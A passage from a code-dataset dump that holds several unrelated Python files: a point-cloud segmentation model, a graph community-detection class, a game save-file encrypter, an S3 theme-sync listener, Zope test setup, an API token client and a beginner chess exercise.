index.add(xyz[batch].cpu().numpy())\n D, I = index.search(center.cpu().numpy(), group_size)\n for i in range(group_num):\n group_xyz[batch][i] = xyz[batch][I[i]]\n group_feature[batch][i] = feature[batch][I[i]]\n return group_xyz, group_feature\n\n\ndef out(x):\n print(x.type(), x.size())\n\ndef cluster(xyz, feature, group_size, group_num, index, train_num=1):\n batch_size = xyz.size(0)\n npoints = xyz.size(1)\n nfeature = feature.size(2)\n device = xyz.get_device()\n center_xyz = torch.rand(batch_size, group_num, 3).cuda(device)\n group_xyz = torch.rand(batch_size, group_num, group_size, 3).cuda(device)\n group_feature = torch.rand(batch_size, group_num, group_size, nfeature).cuda(device)\n \n for batch in range(batch_size):\n # select center points randomly\n ps = xyz[batch].cpu().numpy()\n ft = feature[batch].cpu().detach().numpy()\n indices = np.arange(npoints)\n np.random.shuffle(indices)\n indices = indices[:group_num]\n center_ps = np.take(ps, indices, axis=0)\n for _ in range(train_num):\n # initialize index\n index.reset()\n index.add(center_ps)\n # get the nearest central points for every point\n D, I = index.search(ps, 1)\n # record the class of each point\n label = I.ravel()\n for i in range(group_num):\n if np.where(label == i)[0].shape[0] == 0:\n continue\n group_ps = np.take(ps, np.where(label == i), axis=0)[0]\n center_ps[i] = np.mean(group_ps, axis=0)\n center_xyz[batch] = torch.from_numpy(center_ps)\n x_id = []\n for i in range(group_num):\n group_ps = np.take(ps, np.where(label == i), axis=0)[0]\n group_ft = np.take(ft, np.where(label == i), axis=0)[0]\n number = group_ps.shape[0]\n if number <= 0:\n x_id.append(i)\n break\n for j in range(number, group_size):\n group_ps = np.row_stack((group_ps, group_ps[j - number]))\n group_ft = np.row_stack((group_ft, group_ft[j - number]))\n group_xyz[batch][i] = torch.from_numpy(group_ps[:group_size])\n group_feature[batch][i] = torch.from_numpy(group_ft[:group_size])\n if len(x_id) > 0:\n index.reset()\n index.add(ps)\n x = np.take(center_ps, x_id, axis=0)\n D, I = index.search(np.take(center_ps, x_id, axis=0), group_size)\n for i, center_id in enumerate(x_id):\n group_xyz[batch][center_id] = torch.from_numpy(np.take(ps, I[i], axis=0))\n group_feature[batch][center_id] = torch.from_numpy(np.take(ft, I[i], axis=0))\n return center_xyz, group_xyz, group_feature\n\nclass SA(torch.nn.Module):\n '''\n params: \n npoints, nfeature, group_num, mlp, index\n\n input: \n xyz: batch_size * npoints * 3\n feature: batch_size * npoints * nfeature\n \n output:\n center_xyz: batch_size * group_num * 3\n center_feature: batch_size * group_num * new_feature(mlp[2])\n '''\n def __init__(self, npoints, nfeature, group_num, mlp, index):\n super(SA, self).__init__()\n self.npoints = npoints\n self.index = index\n self.group_num = group_num\n self.group_size = npoints // group_num\n self.nfeature = nfeature\n self.pointnet = Pointnet(self.group_size, nfeature, mlp)\n\n def forward(self, xyz, feature):\n batch_size = xyz.size(0)\n # center_xyz = sample(xyz, self.group_num)\n # group_xyz, group_feature = group(center_xyz, xyz, feature, self.group_size, self.index)\n\n center_xyz, group_xyz, group_feature = cluster(xyz, feature, self.group_size, self.group_num, self.index)\n\n group_feature = group_feature.view(-1, self.group_size, self.nfeature)\n center_feature = self.pointnet(group_feature)\n center_feature = center_feature.view(batch_size, -1, center_feature.size()[1])\n return center_xyz, center_feature\n\n\nclass SegNet(torch.nn.Module):\n def __init__(self, npoints, nclass):\n super(SegNet, self).__init__()\n self.res = faiss.StandardGpuResources()\n self.index = faiss.index_cpu_to_gpu(self.res, 0, faiss.IndexFlatL2(3))\n self.sa1 = SA(npoints, 3, 512, [64, 64, 128], self.index)\n self.sa2 = SA(512, 128, 128, [128, 128, 256], self.index)\n self.sa3 = SA(128, 256, 1, [256, 512, 1024], self.index)\n self.fc3 = torch.nn.Sequential(\n Conv1d(1280, 256),\n Conv1d(256, 256),\n )\n self.fc2 = torch.nn.Sequential(\n Conv1d(384, 256),\n Conv1d(256, 128),\n )\n self.fc1 = torch.nn.Sequential(\n Conv1d(131, 128),\n Conv1d(128, nclass),\n )\n\n def forward(self, x):\n xyz_1, feature_1 = x, x\n xyz_2, feature_2 = self.sa1(xyz_1, feature_1) \n xyz_3, feature_3 = self.sa2(xyz_2, feature_2)\n xyz_4, feature_4 = self.sa3(xyz_3, feature_3)\n print(\"global\")\n fp_feature_3 = torch.cat([feature_3, feature_4.repeat(1, feature_3.size(1), 1)], 2)\n fp_feature_3 = self.fc3(fp_feature_3.transpose(1, 2)).transpose(1, 2)\n fp_feature_2 = self.interpolate(xyz_2, feature_2, xyz_3, fp_feature_3)\n fp_feature_2 = self.fc2(fp_feature_2.transpose(1, 2)).transpose(1, 2)\n fp_feature_1 = self.interpolate(xyz_1, feature_1, xyz_2, fp_feature_2)\n fp_feature_1 = self.fc1(fp_feature_1.transpose(1, 2)).transpose(1, 2)\n print(\"interpolate\")\n return fp_feature_1.contiguous()\n\n def interpolate(self, xyz_down, feature_down, xyz_up, feature_up):\n '''\n xyz_down: batch_size * group_size_down * 3\n feature_down : batch_size * group_size_down * 3\n xyz_up: batch_size * group_size_up * 3\n feature_up : batch_size * group_size_up * 3\n '''\n batch_size = xyz_down.size(0)\n group_size_down = feature_down.size(1)\n feature_size_up = feature_up.size(2)\n feature_size_down = feature_down.size(2)\n device = xyz_down.get_device()\n new_feature = torch.zeros(batch_size, group_size_down, feature_size_up).cuda(device)\n for i in range(batch_size):\n self.index.reset()\n self.index.add(xyz_up[i].cpu().numpy())\n D, I = self.index.search(xyz_down[i].cpu().numpy(), 3)\n for j in range(group_size_down):\n sigma_dis = 0\n for k in range(3):\n if abs(D[j][k] < 1e-6):\n dis = 1e10\n else:\n dis = 1 / D[j][k]\n new_feature[i][j] += feature_up[i][I[j][k]] * dis\n sigma_dis += dis\n new_feature[i][j] /= sigma_dis\n new_feature = torch.cat((new_feature, feature_down), 2)\n return new_feature\n \n\nif __name__ == \"__main__\":\n net = SegNet(2048, 5)\n net.cuda()\n x = torch.randn(20, 2048, 3).cuda()\n y = net(x)\n out(y)\n","sub_path":"model/cstnet.py","file_name":"cstnet.py","file_ext":"py","file_size_in_byte":9701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"147521211","text":"import struct\n\n\n\nimport networkx as nx\n\n\n\nimport community as community_louvain\n\n\n\nclass Graph(object):\n def __init__(self, prefix, directed, colored):\n \"\"\"\n Graph class defines the basic graph structure for addax used for clustering commmunities, motif discovery,\n and generating random examples\n\n @param prefix: a string to reference this graph by\n @param directed: indicates if the graph is directed or undirected\n @param colored: indicates if the nodes in the graph have color\n \"\"\"\n self.prefix = prefix\n self.directed = directed\n self.colored = colored\n\n # vertices is a mapping from the vertex index to the vertex object\n self.vertices = {}\n # edges is a list of edges with sources, destinations, and weights\n self.edges = []\n # the edge set contains a list of (source, destination) indices\n self.edge_set = set()\n\n def AddVertex(self, index, enumeration_index, community = -1, color = -1):\n \"\"\"\n Add a vertex to the graph\n\n @param index: the index for the vertex\n @param enumeration_index: an internal ordering system for enumeration speed up\n @param community: the community that the vertex belongs to (default = -1)\n @param color: the color that the vertex has (default = -1)\n \"\"\"\n # vertices must have unique indices\n assert (not index in self.vertices)\n\n # create the vertex and add it to the mapping\n vertex = self.Vertex(self, index, enumeration_index, community, color)\n self.vertices[index] = vertex\n\n def AddEdge(self, source_index, destination_index, weight = 1):\n \"\"\"\n Add an edge to the graph\n\n @param source_index: the integer of the source index in the graph\n @param destination_index: the integer of the destination index in the graph\n @param weight: the weight of this edge where higher values indicate greater strength (default = 1)\n \"\"\"\n # the source and destination indices must actually belong to vertices\n assert (source_index in self.vertices)\n assert (destination_index in self.vertices)\n\n # do not allow self loops\n assert (not source_index == destination_index)\n\n # if the graph is undirected, make the source destination the smaller of the two indices\n if not self.directed and destination_index < source_index:\n tmp = destination_index\n destination_index = source_index\n source_index = tmp\n\n # create the edge and add it to the list of edges\n edge = self.Edge(self, source_index, destination_index, weight)\n self.edges.append(edge)\n\n # add to the set of edges in the graph for easier look up\n if self.directed:\n self.edge_set.add((source_index, destination_index))\n else:\n # directed edges go in both directions\n self.edge_set.add((source_index, destination_index))\n self.edge_set.add((destination_index, source_index))\n\n # add the edge to both vertices\n self.vertices[source_index].AddEdge(edge)\n self.vertices[destination_index].AddEdge(edge)\n\n def NVertices(self):\n \"\"\"\n Return the number of vertices in this graph\n \"\"\"\n return len(self.vertices.keys())\n\n def NEdges(self):\n \"\"\"\n Return the number of edges in this graph\n \"\"\"\n return len(self.edges)\n\n def DetectCommunities(self, output_filename = None):\n \"\"\"\n Returns a list of communities based on the Louvain algorithm\n \"\"\"\n # initialize a networkx graph\n G = nx.Graph()\n\n # add all vertices\n for vertex in self.vertices.values():\n G.add_node(vertex.index)\n\n # add all edges to the networkx graph\n undirected_edges = {}\n for edge in self.edges:\n # get the min and max edge\n edge_one = min(edge.source_index, edge.destination_index)\n edge_two = max(edge.destination_index, edge.source_index)\n\n if not (edge_one, edge_two) in undirected_edges:\n undirected_edges[(edge_one, edge_two)] = edge.weight\n else:\n undirected_edges[(edge_one, edge_two)] += edge.weight\n\n # add the undirected edge to the graph\n for (edge_one, edge_two) in undirected_edges:\n G.add_edge(edge_one, edge_two, weight=undirected_edges[(edge_one, edge_two)])\n\n # determine communities in the graph\n partition = community_louvain.best_partition(G)\n\n # write the partition to file\n if not output_filename == None:\n with open(output_filename, 'wb') as fd:\n fd.write(struct.pack('q', self.NVertices()))\n for (neuron_id, community) in partition.items():\n fd.write(struct.pack('qq', neuron_id, community))\n\n # get a list of communities using the Louvain algorithm\n return partition\n\n def Communities(self):\n \"\"\"\n Return a mapping from vertex indices to communities\n \"\"\"\n communities = {}\n\n for vertex in self.vertices.values():\n communities[vertex.index] = vertex.community\n\n return communities\n\n class Vertex(object):\n def __init__(self, graph, index, enumeration_index, community = -1, color = -1):\n \"\"\"\n Vertex class defines the vertices in a graph that are labeled by the index\n\n @param graph: the larger graph that contains this vertex\n @param index: the integer index that corresponds to this vertex\n @param enumeration_index: an internal ordering system for enumeration speed up\n @param community: the community that the vertex belongs to (default = -1)\n @param color: the color that the vertex has (default = -1)\n \"\"\"\n self.graph = graph\n self.index = index\n self.enumeration_index = enumeration_index\n self.community = community\n self.color = color\n\n # extra instance variables keep track of the ingoing and outgoing edges from the vertex\n self.incoming_edges = []\n self.outgoing_edges = []\n # keep track of incoming and outgoing neighbors\n self.incoming_neighbors = set()\n self.outgoing_neighbors = set()\n self.neighbors = set()\n\n def AddEdge(self, edge):\n \"\"\"\n Add this edge to the set of edges for this vertex and ensure no edge parallelism\n\n @param edge: the edge that connects this vertex to another\n \"\"\"\n # ensure that this is a valid edge for this vertex\n assert (edge.source_index == self.index or edge.destination_index == self.index)\n\n # if the graph is directed, add the incoming or outgoing edge\n if self.graph.directed:\n if edge.source_index == self.index:\n self.outgoing_edges.append(edge)\n assert (not edge.destination_index in self.outgoing_neighbors)\n self.outgoing_neighbors.add(edge.destination_index)\n self.neighbors.add(edge.destination_index)\n else:\n self.incoming_edges.append(edge)\n assert (not edge.source_index in self.incoming_neighbors)\n self.incoming_neighbors.add(edge.source_index)\n self.neighbors.add(edge.source_index)\n # if the graph is not directed, add the edge to both incoming and outgoing\n else:\n self.incoming_edges.append(edge)\n self.outgoing_edges.append(edge)\n\n if edge.source_index == self.index:\n assert (not edge.destination_index in self.incoming_neighbors and not edge.destination_index in self.outgoing_neighbors)\n self.incoming_neighbors.add(edge.destination_index)\n self.outgoing_neighbors.add(edge.destination_index)\n self.neighbors.add(edge.destination_index)\n else:\n assert (not edge.source_index in self.incoming_neighbors and not edge.source_index in self.outgoing_neighbors)\n self.incoming_neighbors.add(edge.source_index)\n self.outgoing_neighbors.add(edge.source_index)\n self.neighbors.add(edge.source_index)\n\n def IncomingNeighborIndices(self):\n \"\"\"\n Returns the neighbors with edges going from\n \"\"\"\n return self.incoming_neighbors\n\n def OutgoingNeighborIndices(self):\n \"\"\"\n Returns the neighbors with an edge from this vertex to that neighbor\n \"\"\"\n return self.outgoing_neighbors\n\n def NeighborIndices(self):\n \"\"\"\n Return all neighbors from this vertex regardless of incoming and outgoing status\n \"\"\"\n return self.neighbors\n\n\n class Edge(object):\n def __init__(self, graph, source_index, destiantion_index, weight = 1):\n \"\"\"\n Edge class defines the edges in a graph that connect the vertices\n\n @param graph: the larger graph that contains this edge\n @param source_index: the integer of the source index in the graph\n @param destination_index: the integer of the destination index in the graph\n @param weight: the weight of this edge where higher values indicate greater strength (default = 1)\n \"\"\"\n self.graph = graph\n self.source_index = source_index\n self.destination_index = destiantion_index\n self.weight = weight\n","sub_path":"data_structures/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":9812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"597136092","text":"#! /usr/bin/env python3\n\ndef main():\n a = [((1,2),(3,5))]\n iterateur = iter(a)\n# depart = next(iterateur)\n# prec = depart\n# n = [ p for p,s in iterateur if p!=s]\n for p,s in iterateur:\n if p!=s:\n print(p!=s)\n\n\n\n\n\n\nmain()\n","sub_path":"semestre5/python/test/exam_mi_semestre2016/exam2016.py","file_name":"exam2016.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"4317696","text":"\"\"\"\nencrypt.py- encrypter for stickmanranger save files.\nI want people to be able to mad this game, but i dont \nnecessarily want people to be able to change it up \nsuper easily!\"\"\"\nfrom cryptography.fernet import Fernet\nfrom itertools import count\nimport os\nimport shutil\nimport time\n\nif not os.name == 'nt':\n os.getlogin = lambda: __import__('pwd').getpwuid(os.getuid())[0]\n\nCURRENT_TIME = time.asctime()\nPATH = {\n 'nt': 'C:\\\\Users\\\\{}\\\\.stickman_new_world\\\\save\\\\'.format(os.getlogin()),\n 'posix': '/home/{}/.stickman_new_world/save/'.format(os.getlogin()),\n}[os.name]\n\nPATH_NUMERIC = os.path.join(PATH, '%s') + '\\\\' if os.name == 'nt' else '/'\nprint(PATH_NUMERIC)\n\nif not os.path.exists(PATH):\n os.makedirs(PATH)\n\nFILE = PATH + '.smr-save'\nprint(FILE)\n\n\ndef encrypt(string):\n if not os.path.exists(PATH):\n os.makedirs(PATH)\n\n prev_key = os.listdir(PATH)\n for f in prev_key:\n if not f in ('.smr-save', 'time'):\n os.remove(PATH + f)\n\n prev_dir = 0\n for number in count():\n if os.path.exists(PATH_NUMERIC % number):\n prev_dir = number\n\n else:\n # the system can't find this file, but it will only\n # be the first one it doesnt find.\n prev_dir = number\n break\n\n def_path = PATH\n # os.mkdir(def_path)\n\n key = Fernet.generate_key()\n # simply make a file with that name\n with open(def_path + key.decode(), 'w'):\n pass\n\n encrypter = Fernet(key)\n cipher = encrypter.encrypt(string.encode())\n\n with open(FILE, 'wb') as cipher_file:\n cipher_file.write(cipher)\n\n with open((os.path.join(def_path, 'time')), 'w') as time_file:\n time_file.write(CURRENT_TIME)\n return cipher\n\n\ndef decrypt(spec=None):\n prev_dir = spec\n\n if spec is None:\n prev_dir = 0\n for number in count():\n if os.path.exists(PATH_NUMERIC % number):\n prev_dir = number\n\n else:\n # the system can't find this file, but it will only\n # be the first one it doesnt find.\n break\n\n data = open(FILE, 'rb').read()\n key = os.listdir(PATH)\n key.pop(key.index('.smr-save'))\n key.pop(key.index('time'))\n key = key[0].encode()\n\n encrypter = Fernet(key)\n text = encrypter.decrypt(data).decode()\n\n saved_time = open(os.path.join(PATH, 'time')).read()\n\n return text, saved_time\n\n\nif __name__ == '__main__':\n time = __import__('time').asctime()\n print(encrypt(open('misc\\\\shello.ini').read()))\n print(decrypt()[0], decrypt()[1], sep='\\n\\n\\n')\n","sub_path":"game/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"631959743","text":"# Copyright (c) 2014 LemonStand eCommerce Inc. https://lemonstand.com/\n# All rights reserved.\n#\n# This is free and unencumbered software released into the public domain.\n\n# Anyone is free to copy, modify, publish, use, compile, sell, or\n# distribute this software, either in source code form or as a compiled\n# binary, for any purpose, commercial or non-commercial, and by any\n# means.\n#\n# In jurisdictions that recognize copyright laws, the author or authors\n# of this software dedicate any and all copyright interest in the\n# software to the public domain. We make this dedication for the benefit\n# of the public at large and to the detriment of our heirs and\n# successors. We intend this dedication to be an overt act of\n# relinquishment in perpetuity of all present and future rights to this\n# software under copyright law.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR\n# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,\n# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\n# OTHER DEALINGS IN THE SOFTWARE.\n#\n# For more information, please refer to \n\nimport sys \nimport time\nimport os \nimport json\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nimport time\nfrom Connector import Connector\nfrom watchdog.events import PatternMatchingEventHandler\nfrom colorama import Fore, Back, Style\n\nclass Listener (PatternMatchingEventHandler):\n\t# The number of times to retry a connection to LemonStand API\n\tRETRIES = 2\n\n\tdef __init__ (self, connection, config, utils):\n\t\tPatternMatchingEventHandler.patterns = config.file_patterns\n\t\tPatternMatchingEventHandler.ignore_patterns = config.ignore_patterns\n\t\tPatternMatchingEventHandler.ignore_directories = True\n\t\tPatternMatchingEventHandler.case_sensitive = True\n\n\t\tself.connection = connection\n\t\tself.config = config\n\t\tself.utils = utils\n\t\tself.reset = self.RETRIES\n\n\tdef __check_connection (self):\n\t\t# Get a new connection object to lemonstand API\n\t\tc = Connector()\n\t\tidentity = c.get_identity(self.config.api_host, self.config.api_access)\n\t\tconnection = c.s3_connection(identity);\n\t\tself.connection = connection\n\n\t\treturn\n\n\tdef __reset_retries (self):\n\t\tself.reset = self.RETRIES\n\n\tdef __register (self, event_path):\n\t\tpath = event_path.replace(self.config.watch_dir, '')\n\t\tdata = { 'keys': [path.replace('\\\\', '/')] }\n\n\t\ttry:\n\t\t\t# Update the resource with LemonStand\n\t\t\tres = requests.put(\n\t\t\t\tself.config.api_host + '/api/v2/resource/touch', \n\t\t\t\theaders = { \n\t\t\t\t\t'Content-Type': 'application/json',\n\t\t\t\t\t'Authorization': 'Bearer ' + self.config.api_access\n\t\t\t\t},\n\t\t\t\tdata=json.dumps(data), \n\t\t\t\tallow_redirects=False,\n\t\t\t\tverify=False\n\t\t\t)\n\n\t\t\tif res.status_code != 200:\n\t\t\t\traise Exception()\n\t\texcept:\n\t\t\tprint(Fore.RED + '[' + time.strftime(\"%c\") + '] Failed to register file with LemonStand!' + Style.RESET_ALL)\n\n\tdef remove (self, event_path):\n\t\tpath = event_path.replace(self.config.watch_dir, '')\n\t\tkey = \"/\".join([self.connection[\"store\"], \"themes\", self.connection[\"theme\"], path.replace('\\\\', '/')])\n\n\t\ttry:\n\t\t\tself.connection[\"bucket\"].delete_key(key)\n\t\t\tprint(Fore.GREEN + '[' + time.strftime(\"%c\") + '] Successfully removed ' + path + Style.RESET_ALL)\n\t\texcept:\n\t\t\tif (self.reset > 0):\n\t\t\t\tself.reset-=1\n\t\t\t\tself.__check_connection()\n\t\t\t\tself.remove(event_path)\n\t\t\telse:\n\t\t\t\tprint(Fore.RED + '[' + time.strftime(\"%c\") + '] Failed to remove ' + path + Style.RESET_ALL)\n\n\t\tself.__reset_retries()\n\t\t# Register the file with LS\n\t\tself.__register(event_path)\n\n\tdef upsert (self, event_path):\n\t\tpath = event_path.replace(self.config.watch_dir, '')\n\t\tkey = \"/\".join([self.connection[\"store\"], \"themes\", self.connection[\"theme\"], path.replace('\\\\', '/')])\n\t\texpires = int(time.time())\n\t\theaders = {\n\t\t\t'Cache-Control': \"max-age=\" + str(expires) + \", public\",\n\t\t\t'Expires': expires\n\t\t}\n\n\t\ttry:\n\t\t\tk = self.connection[\"bucket\"].new_key(key)\n\t\t\tk.set_contents_from_filename(event_path, headers=headers)\n\t\t\tprint(Fore.GREEN + '[' + time.strftime(\"%c\") + '] Successfully uploaded ' + path + Style.RESET_ALL)\n\t\texcept:\n\t\t\tif (self.reset > 0):\n\t\t\t\tself.reset-=1\n\t\t\t\tself.__check_connection()\n\t\t\t\tself.upsert(event_path)\n\t\t\telse:\n\t\t\t\tprint(Fore.RED + '[' + time.strftime(\"%c\") + '] Failed to upload ' + path + Style.RESET_ALL)\n\n\t\tself.__reset_retries()\n\t\t# Register the file with LS\n\t\tself.__register(event_path)\n\n\tdef on_modified (self, event):\n\t\tself.upsert(event.src_path)\n\n\tdef on_created (self, event):\n\t\tself.upsert(event.src_path)\n\n\tdef on_moved (self, event):\n\t\tself.upsert(event.dest_path)\n\n\tdef on_deleted (self, event):\n\t\tself.remove(event.src_path)","sub_path":"lemonsync/Listener.py","file_name":"Listener.py","file_ext":"py","file_size_in_byte":4906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"226091348","text":"##############################################################################\n#\n# Copyright (c) 2003 Zope Corporation. All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Visible Source\n# License, Version 1.0 (ZVSL). A copy of the ZVSL should accompany this\n# distribution.\n#\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE\n#\n##############################################################################\n\"\"\"\n\n$Id$\n\"\"\"\nimport unittest\nfrom zope.app.testing import placelesssetup\nfrom zope import component, interface\nimport zope.publisher.interfaces.browser\nimport zope.schema.interfaces\nimport zope.app.form.browser\nfrom zc.sharing import policy\nimport zc.sharing.sharing\nimport zc.table.interfaces\nimport zc.table.table\n\nclass ICon:\n \n def __init__(self, name):\n self.name = name\n\n def __call__(self, request=None):\n if request is None:\n return 'http://mysite/%s' % self.name\n \n return self\n\ndef sharingSetUp(test):\n placelesssetup.setUp(test)\n component.provideAdapter(\n zope.app.form.browser.CheckBoxWidget,\n (zope.schema.interfaces.IBool,\n zope.publisher.interfaces.browser.IBrowserRequest,\n ),\n zope.app.form.interfaces.IInputWidget)\n component.provideAdapter(\n ICon('user_icon.gif'),\n [zope.publisher.interfaces.browser.IBrowserRequest],\n interface.Interface, 'user_icon.gif')\n component.provideAdapter(\n ICon('group_icon.gif'),\n [zope.publisher.interfaces.browser.IBrowserRequest],\n interface.Interface, 'group_icon.gif')\n interface.directlyProvides(zc.table.table.FormFullFormatter,\n zc.table.interfaces.IFormatterFactory)\n component.provideUtility(zc.table.table.FormFullFormatter,\n zc.table.interfaces.IFormatterFactory)\n\ndef sharingTearDown(test):\n placelesssetup.tearDown()\n zc.sharing.sharing.clearPrivileges()\n\ndef test_suite():\n from zope.testing import doctest\n return unittest.TestSuite((\n doctest.DocFileSuite(\n 'sharing.txt',\n setUp=sharingSetUp, tearDown=sharingTearDown,\n optionflags=doctest.NORMALIZE_WHITESPACE,\n ),\n ))\n\nif __name__ == '__main__':\n unittest.main(defaultTest='test_suite')\n\n","sub_path":"zc.sharing/trunk/src/zc/sharing/browser/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"457059901","text":"#-*- coding:utf-8 -*-\n__author__ = 'TAOQIN001'\n\n\nfrom datetime import datetime\nimport json\nimport hmac\nimport hashlib\nimport traceback\nimport uuid\nfrom urllib.parse import unquote\nimport requests\n\nclass GetToken(object):\n\n def __init__(self, user, pwd , endpoint=\"http://10.1.249.11:8070/api\"):\n self.echoToken = str(uuid.uuid1())\n self.user = user\n self.pwd = pwd\n self.endpoint = endpoint\n\n def get_caller_and_secrets(self):\n try:\n r = requests.get(url=self.endpoint + \"/Caller\", timeout=60)\n caller = str((json.loads(r.content)[0]).split(':')[1])\n except Exception:\n traceback.print_exc()\n raise Exception(u\"get caller failed lead to get access token failed\")\n else:\n try:\n headers = {\"echoToken\": str(self.echoToken)}\n r = requests.post(url=self.endpoint + \"/Caller?Key=\" + caller, headers=headers).content\n secrets = unquote(r.split(\",\")[1].split(\":\")[1])\n if secrets[-1] == '\"':\n secrets = secrets[:-2]\n except Exception:\n traceback.print_exc()\n raise Exception(u\"get secrets failed lead to get access token failed\")\n return caller, secrets\n\n\n def CalculateTokenSign(self):\n '''\n 根据caller和secret计算获取access token的签名\n '''\n caller, secret = self.get_caller_and_secrets()\n strDate = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n tokenSign = hmac.new(secret, caller + strDate, hashlib.md5).hexdigest()\n return tokenSign, strDate, caller\n\n\n def get_token(self):\n \"\"\"\n # 获取auth环境的user_token,access_token\n # 返回类型为list\n # 分别为:user_token,access_token\n \"\"\"\n result = list()\n # 计算 CallerId,SignDate,Sign值;然后调用AccessToken接口,获取AccessToken值。\n tokenSign, strDate, caller =self.CalculateTokenSign()\n token_sign = json.dumps({'CallerId': caller, 'Sign': tokenSign, 'SignDate': strDate})\n url2 = self.endpoint + \"/AccessToken\"\n headers = {\"Content-Type\": \"application/json\"}\n headers[\"echoToken\"] = str(self.echoToken)\n try:\n r2 = requests.post(url=url2, data=token_sign, headers=headers, timeout=60)\n assert r2.status_code == 200, \"status_code is not 200.{0},{1}\".format(url2, r2.status_code)\n except:\n traceback.print_exc()\n else:\n try:\n access_token = json.loads(r2.text)['AccessToken']\n except:\n traceback.print_exc()\n else:\n # 先调用登录接口/api/Login,获取STToken值; 再调用/api/Token,获取UserToken值\n url3 = self.endpoint + \"/Login\"\n headers = dict()\n headers[\"Content-Type\"] = \"application/json\"\n headers[\"AccessToken\"] = access_token\n headers[\"echoToken\"] = str(self.echoToken)\n data_dict = dict()\n data_dict[\"Username\"] = self.user\n data_dict[\"Password\"] = self.pwd\n\n data_dict[\"HmacSign\"] = \"niwei001\"\n data = json.dumps(data_dict, ensure_ascii=False)\n try:\n r3 = requests.post(url=url3, data=data, headers=headers, timeout=60)\n assert r3.status_code == 200, \"status_code is not 200\"\n except:\n traceback.print_exc()\n else:\n try:\n st_token = json.loads(r3.text)[\"St\"][\"STToken\"]\n except:\n traceback.print_exc()\n else:\n url4 = self.endpoint + \"/Token\"\n headers = dict()\n headers[\"Content-Type\"] = \"application/json\"\n headers[\"AccessToken\"] = access_token\n headers[\"echoToken\"] = str(self.echoToken)\n data_dict = dict()\n data_dict[\"STToken\"] = st_token\n data_dict[\"HmacSign\"] = \"niwei001\"\n data = json.dumps(data_dict, ensure_ascii=False)\n try:\n r4 = requests.post(url=url4, data=data, headers=headers, timeout=60)\n assert r4.status_code == 200, \"status_code is not 200\"\n except:\n traceback.print_exc()\n else:\n try:\n user_token = json.loads(r4.text)['Token']\n except:\n traceback.print_exc()\n else:\n # 封装到list中\n result.append(user_token)\n result.append(access_token)\n try:\n a=result[0]\n except Exception as e:\n raise e+\"\\nget tokenlist is \"+str(result)\n return result\n\n# if __name__ == \"__main__\":\n# a = GetToken(\"13761701741\", \"a\")\n# print a.get_token()\n","sub_path":"utils/hhub3/gettoken.py","file_name":"gettoken.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"422675199","text":"\"\"\"Користувач вводить координати клітин. Програма рахує, чи може\n\r\nпоходити слон\"\"\"\n\"\"\"\nblack - x парні, у парні\n \r\nх непарні, у непарні\r\n\nwhite - х парні, у непарні\n \r\nх непарні, у парні\n\"\"\"\r\n\nprint(\"Please, enter four coordinates from 1 to 8 in format X\")\r\n\nx1=int(input(\"X1 is: \"))\r\n\ny1=int(input(\"Y1 is: \"))\r\n\nx2=int(input(\"X2 is: \"))\r\n\ny2=int(input(\"Y2 is: \"))\r\n\nif (x1%2==1 and y1%2==1) or (x1%2==0 and y1%2==0): #for first - black \n \r\n\tif (x2%2==1 and y2%2==1) or (x2%2==0 and y2%2==0): #for second - black \n \r\n\t\tprint(\"TRUE\") \n \r\n\telse: #for second - white \n \r\n\t\tprint(\"FALSE\") \r\n\nelse: #for first - white \n \r\n\tif (x2%2==1 and y2%2==0) or (x2%2==0 and y2%2==1): #for second - white \n \r\n\t\tprint(\"TRUE\") \n \r\n\telse: #for second - black \n \r\n\t\tprint(\"FALSE\")\r\n\nif (x2-x1==y1-y2) or (x2-x1==y2-y1):\n \r\n\tprint(\"YES\")\r\n\nelif (x1-x2==y1-y2) or (x1-x2==y2-y1):\n \r\n\tprint(\"YES\")\r\n\nelse:\n \r\n\tprint(\"NO\")\r\n\r\n#----------------------------------------------------------------------------\r\npin_throw = input()\r\n\r\nN = int(pin_throw.split()[0])\r\n\r\nK = int(pin_throw.split()[1])\r\n\r\nlist_to_compare = []\r\n\r\nlist_a = []\r\n\r\nfor j in range(1, N + 1):\r\n list_to_compare.append(j)\r\n\r\nfor i in range(K):\r\n\r\n row = input()\r\n\r\n left = int(row.split()[0])\r\n\r\n right = int(row.split()[1])\r\n\r\n for i in range(left, right + 1):\r\n list_a.append(i)\r\n\r\nfor element in list_to_compare:\r\n\r\n if element in list_a:\r\n\r\n print('.', end=\"\")\r\n\r\n else:\r\n\r\n print('I', 